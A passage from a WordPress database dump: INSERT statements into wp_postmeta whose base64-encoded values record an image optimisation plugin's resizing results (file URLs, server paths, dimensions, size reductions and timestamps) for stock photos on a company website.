cGhvdG8xMzAxMDI2Ni0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgwOCwiaWQiOjI1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgxMCwiaWQiOjI1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgxMywiaWQiOjI1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgxNiwiaWQiOjI1MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xMzAxMDI2Ni02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgxOCwiaWQiOjI1MH1d'); 
INSERT INTO `wp_postmeta` VALUES (30289, 249, 'wpfc_optimisation_reduction', '31219'); 
INSERT INTO `wp_postmeta` VALUES (30290, 249, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDUzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDkuanBnIiwicmVkdWN0aW9uIjozMTIwNSwidGltZSI6MTQ4MzU4ODgyNywiaWQiOiIyNDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODgyOSwiaWQiOjI0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS04MDB4NTI3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTI3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTgwMHg1MjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktODAweDUyNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4MzIsImlkIjoyNDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktNzY4eDUwNS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUwNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS03Njh4NTA1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTc2OHg1MDUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4ODM1LCJpZCI6MjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTE2MDB4MTA1My5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDUzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTE2MDB4MTA1My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0xNjAweDEwNTMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4ODM5LCJpZCI6MjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg0MSwiaWQiOjI0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4NDMsImlkIjoyNDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4ODQ1LCJpZCI6MjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg0OCwiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg1MCwiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg1MywiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg1NSwiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg1NywiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg2MCwiaWQiOjI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG85MTI2NTA5LTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzkxMjY1MDktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvOTEyNjUwOS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg2MiwiaWQiOjI0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (30291, 247, 'wpfc_optimisation_reduction', '106503'); 
INSERT INTO `wp_postmeta` VALUES (30292, 247, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi5qcGciLCJ3aWR0aCI6MzUwMCwiaGVpZ2h0IjoyMzI1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDIuanBnIiwicmVkdWN0aW9uIjoxMDY0ODksInRpbWUiOjE0ODM1ODg4NzMsImlkIjoiMjQ3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4NzUsImlkIjoyNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi04MDB4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTgwMHg1MzEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4ODc4LCJpZCI6MjQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTc2OHg1MTAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi03Njh4NTEwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg4MSwiaWQiOjI0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0xNjAweDEwNjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMTYwMHgxMDYzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODg4NSwiaWQiOjI0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg4ODcsImlkIjoyNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzcwNDg1MDItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNzA0ODUwMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG83MDQ4NTAyLTIwMHgyMDAuanBnIiwicm